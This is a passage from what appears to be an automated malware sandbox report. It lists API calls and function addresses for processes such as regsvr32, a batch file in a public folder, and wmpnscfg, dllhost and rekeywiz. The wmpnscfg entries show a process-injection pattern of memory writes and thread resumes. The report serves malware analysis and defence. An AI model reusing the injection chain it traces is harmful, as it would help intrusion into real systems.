                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C56A8 NtQuerySystemInformation,NtQuerySystemInformation,lstrcmpiW,CloseHandle,free,7_2_1C0C56A8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C51B4 NtQueryInformationProcess,7_2_1C0C51B4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_3_00007DF423EB1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,14_3_00007DF423EB1CE8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_3_00007DF423EB1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,14_3_00007DF423EB1958
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D27B8 NtAcceptConnectPort,14_2_00000203FE6D27B8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D288C NtAcceptConnectPort,14_2_00000203FE6D288C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D28E8 NtAcceptConnectPort,14_2_00000203FE6D28E8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D28B8 NtAcceptConnectPort,14_2_00000203FE6D28B8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D2990 NtAcceptConnectPort,14_2_00000203FE6D2990
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D2418 NtAcceptConnectPort,14_2_00000203FE6D2418
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D2C64 NtAcceptConnectPort,14_2_00000203FE6D2C64
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D252C NtAcceptConnectPort,14_2_00000203FE6D252C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D29D4 NtAcceptConnectPort,14_2_00000203FE6D29D4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00007DF423EB1E64 CreateProcessW,NtResumeThread,CloseHandle,14_2_00007DF423EB1E64
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00007DF423EB199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,14_2_00007DF423EB199C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00007DF423EC2704 NtQuerySystemInformation,free,malloc,NtQuerySystemInformation,14_2_00007DF423EC2704
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF1385C NtQuerySystemInformation,15_2_000002913DF1385C
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5A288C NtAcceptConnectPort,16_2_00000260AF5A288C
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5A2688 NtAcceptConnectPort,16_2_00000260AF5A2688
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E946190: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError,3_2_00007FF79E946190
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E94B6303_2_00007FF79E94B630
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9494D03_2_00007FF79E9494D0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8F2FE93_2_00007FF79E8F2FE9
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E942E703_2_00007FF79E942E70
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E923FB73_2_00007FF79E923FB7
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A7FA03_2_00007FF79E9A7FA0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97FFF03_2_00007FF79E97FFF0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99BF203_2_00007FF79E99BF20
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8FFF833_2_00007FF79E8FFF83
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A40C03_2_00007FF79E9A40C0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E98A0E03_2_00007FF79E98A0E0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9820303_2_00007FF79E982030
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E923DD03_2_00007FF79E923DD0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97FE003_2_00007FF79E97FE00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E969E0B3_2_00007FF79E969E0B
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99BDE03_2_00007FF79E99BDE0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E93FF103_2_00007FF79E93FF10
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97DEF03_2_00007FF79E97DEF0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E999BC03_2_00007FF79E999BC0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E98DBE03_2_00007FF79E98DBE0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E963B403_2_00007FF79E963B40
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E909B303_2_00007FF79E909B30
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E925CC03_2_00007FF79E925CC0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E93DD003_2_00007FF79E93DD00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A5CE03_2_00007FF79E9A5CE0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90DC803_2_00007FF79E90DC80
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97B9B03_2_00007FF79E97B9B0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9799203_2_00007FF79E979920
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E95F9603_2_00007FF79E95F960
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A7AC03_2_00007FF79E9A7AC0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E953AA03_2_00007FF79E953AA0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E995B003_2_00007FF79E995B00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E921B003_2_00007FF79E921B00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8F1A313_2_00007FF79E8F1A31
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E951A403_2_00007FF79E951A40
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E93DA503_2_00007FF79E93DA50
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90BA803_2_00007FF79E90BA80
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E96B7FD3_2_00007FF79E96B7FD
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E91B8003_2_00007FF79E91B800
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8FF7E03_2_00007FF79E8FF7E0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9897503_2_00007FF79E989750
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99B7203_2_00007FF79E99B720
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E98F7303_2_00007FF79E98F730
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9917803_2_00007FF79E991780
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9577703_2_00007FF79E957770
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9618A03_2_00007FF79E9618A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97F8403_2_00007FF79E97F840
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E96D8873_2_00007FF79E96D887
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9695B63_2_00007FF79E9695B6
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9215E03_2_00007FF79E9215E0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A15DD3_2_00007FF79E9A15DD
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9375F03_2_00007FF79E9375F0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97F5F03_2_00007FF79E97F5F0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E92D5203_2_00007FF79E92D520
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9975303_2_00007FF79E997530
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97D6A83_2_00007FF79E97D6A8
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9016653_2_00007FF79E901665
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8F565B3_2_00007FF79E8F565B
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E96D6713_2_00007FF79E96D671
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A54103_2_00007FF79E9A5410
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9933503_2_00007FF79E993350
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90B3503_2_00007FF79E90B350
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9A73303_2_00007FF79E9A7330
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9634B63_2_00007FF79E9634B6
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97F4403_2_00007FF79E97F440
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90D1D03_2_00007FF79E90D1D0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E91B2003_2_00007FF79E91B200
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E98D1603_2_00007FF79E98D160
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9471703_2_00007FF79E947170
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9132903_2_00007FF79E913290
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97CFCB3_2_00007FF79E97CFCB
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E95D0A03_2_00007FF79E95D0A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97F0A03_2_00007FF79E97F0A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90F0303_2_00007FF79E90F030
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E92F0603_2_00007FF79E92F060
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8FEDB43_2_00007FF79E8FEDB4
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99ADE03_2_00007FF79E99ADE0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E920D803_2_00007FF79E920D80
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E938C003_2_00007FF79E938C00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E994BF03_2_00007FF79E994BF0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E932B803_2_00007FF79E932B80
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E968CAC3_2_00007FF79E968CAC
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E95ED003_2_00007FF79E95ED00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E990CE03_2_00007FF79E990CE0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E998CF03_2_00007FF79E998CF0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90AC303_2_00007FF79E90AC30
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99EC603_2_00007FF79E99EC60
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9829203_2_00007FF79E982920
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9749203_2_00007FF79E974920
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E96A9903_2_00007FF79E96A990
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E934AC03_2_00007FF79E934AC0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E992B003_2_00007FF79E992B00
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E978A203_2_00007FF79E978A20
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9627A43_2_00007FF79E9627A4
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9047CD3_2_00007FF79E9047CD
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E92A7403_2_00007FF79E92A740
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9947503_2_00007FF79E994750
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9108203_2_00007FF79E910820
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90C8603_2_00007FF79E90C860
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9308703_2_00007FF79E930870
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9885203_2_00007FF79E988520
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9245793_2_00007FF79E924579
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9906A03_2_00007FF79E9906A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9967103_2_00007FF79E996710
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9026E23_2_00007FF79E9026E2
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9503A03_2_00007FF79E9503A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97C3563_2_00007FF79E97C356
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E97C3583_2_00007FF79E97C358
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E98E4C03_2_00007FF79E98E4C0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90A4A03_2_00007FF79E90A4A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90446C3_2_00007FF79E90446C
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9841B03_2_00007FF79E9841B0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99C1F03_2_00007FF79E99C1F0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E96C1203_2_00007FF79E96C120
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E91E1803_2_00007FF79E91E180
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E90C1703_2_00007FF79E90C170
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E99A2A03_2_00007FF79E99A2A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9382A03_2_00007FF79E9382A0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E96E23A3_2_00007FF79E96E23A
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E8FE28F3_2_00007FF79E8FE28F
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC454DFA4_2_00007FFAAC454DFA
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F318D77_3_02F318D7
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F318D77_2_02F318D7
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F308A47_2_02F308A4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F308377_2_02F30837
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C4A547_2_1C0C4A54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C870C7_2_1C0C870C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C710C7_2_1C0C710C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C15007_2_1C0C1500
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C2F007_2_1C0C2F00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C8A587_2_1C0C8A58
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C5BC07_2_1C0C5BC0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C3CEC7_2_1C0C3CEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0C9FFC7_2_1C0C9FFC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00007FFAAC44098D7_2_00007FFAAC44098D
                        Source: C:\Windows\System32\OpenWith.exeCode function: 11_3_000001BD8784115011_3_000001BD87841150
                        Source: C:\Windows\System32\OpenWith.exeCode function: 11_3_000001BD8534096711_3_000001BD85340967
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_3_00007DF423EB392C14_3_00007DF423EB392C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_3_00007DF423EB220414_3_00007DF423EB2204
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_3_00007DF423EB4EFC14_3_00007DF423EB4EFC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6C262814_2_00000203FE6C2628
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D2D2414_2_00000203FE6D2D24
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6CC25C14_2_00000203FE6CC25C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6DD01014_2_00000203FE6DD010
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6FA81C14_2_00000203FE6FA81C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6E709414_2_00000203FE6E7094
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE70087414_2_00000203FE700874
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6ED85414_2_00000203FE6ED854
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F591814_2_00000203FE6F5918
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F48D014_2_00000203FE6F48D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6FE98414_2_00000203FE6FE984
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6E017414_2_00000203FE6E0174
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6FF94014_2_00000203FE6FF940
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6DF61814_2_00000203FE6DF618
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F4DE814_2_00000203FE6F4DE8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F95D414_2_00000203FE6F95D4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F55B014_2_00000203FE6F55B0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6E768414_2_00000203FE6E7684
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F5EC814_2_00000203FE6F5EC8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6E3EA414_2_00000203FE6E3EA4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6DBEB814_2_00000203FE6DBEB8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6E86B414_2_00000203FE6E86B4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F3F7014_2_00000203FE6F3F70
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6DC75014_2_00000203FE6DC750
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D6F2414_2_00000203FE6D6F24
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6FCC0014_2_00000203FE6FCC00
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F047814_2_00000203FE6F0478
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE70643414_2_00000203FE706434
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6E6D1814_2_00000203FE6E6D18
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6DDCE414_2_00000203FE6DDCE4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6FECE414_2_00000203FE6FECE4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6C14D014_2_00000203FE6C14D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE700D9014_2_00000203FE700D90
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6FF1D014_2_00000203FE6FF1D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D727014_2_00000203FE6D7270
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE70027014_2_00000203FE700270
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F4A5014_2_00000203FE6F4A50
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE703A4D14_2_00000203FE703A4D
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6F3A3814_2_00000203FE6F3A38
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6D5ADC14_2_00000203FE6D5ADC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6DE39814_2_00000203FE6DE398
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00007DF423EB22CC14_2_00007DF423EB22CC
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF3C66815_2_000002913DF3C668
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF3466015_2_000002913DF34660
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF1D60415_2_000002913DF1D604
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF41E0815_2_000002913DF41E08
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2AE1015_2_000002913DF2AE10
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF18DF415_2_000002913DF18DF4
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF1C5D415_2_000002913DF1C5D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF325B415_2_000002913DF325B4
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF29D3015_2_000002913DF29D30
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2E51C15_2_000002913DF2E51C
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2A4F815_2_000002913DF2A4F8
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF3C50015_2_000002913DF3C500
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2A86015_2_000002913DF2A860
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2981815_2_000002913DF29818
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF1BFE415_2_000002913DF1BFE4
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF227A415_2_000002913DF227A4
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2F76C15_2_000002913DF2F76C
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF28EB815_2_000002913DF28EB8
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF3225415_2_000002913DF32254
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF3321015_2_000002913DF33210
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2999815_2_000002913DF29998
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF2898015_2_000002913DF28980
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF3414415_2_000002913DF34144
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF1BC6815_2_000002913DF1BC68
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF253C815_2_000002913DF253C8
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF1737C15_2_000002913DF1737C
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF33B4015_2_000002913DF33B40
                        Source: C:\Windows\System32\dllhost.exeCode function: 15_2_000002913DF32AA015_2_000002913DF32AA0
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5A2D2416_2_00000260AF5A2D24
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C55B016_2_00000260AF5C55B0
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C95D416_2_00000260AF5C95D4
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5D0D9016_2_00000260AF5D0D90
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF59262816_2_00000260AF592628
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C4DE816_2_00000260AF5C4DE8
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5AF61816_2_00000260AF5AF618
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5914D016_2_00000260AF5914D0
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C047816_2_00000260AF5C0478
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5CECE416_2_00000260AF5CECE4
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5ADCE416_2_00000260AF5ADCE4
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5B6D1816_2_00000260AF5B6D18
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5AE39816_2_00000260AF5AE398
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5D643416_2_00000260AF5D6434
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5CCC0016_2_00000260AF5CCC00
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5A5ADC16_2_00000260AF5A5ADC
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5A727016_2_00000260AF5A7270
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5D027016_2_00000260AF5D0270
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5CF1D016_2_00000260AF5CF1D0
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5B017416_2_00000260AF5B0174
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5CE98416_2_00000260AF5CE984
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C3A3816_2_00000260AF5C3A38
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF59C25C16_2_00000260AF59C25C
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C4A5016_2_00000260AF5C4A50
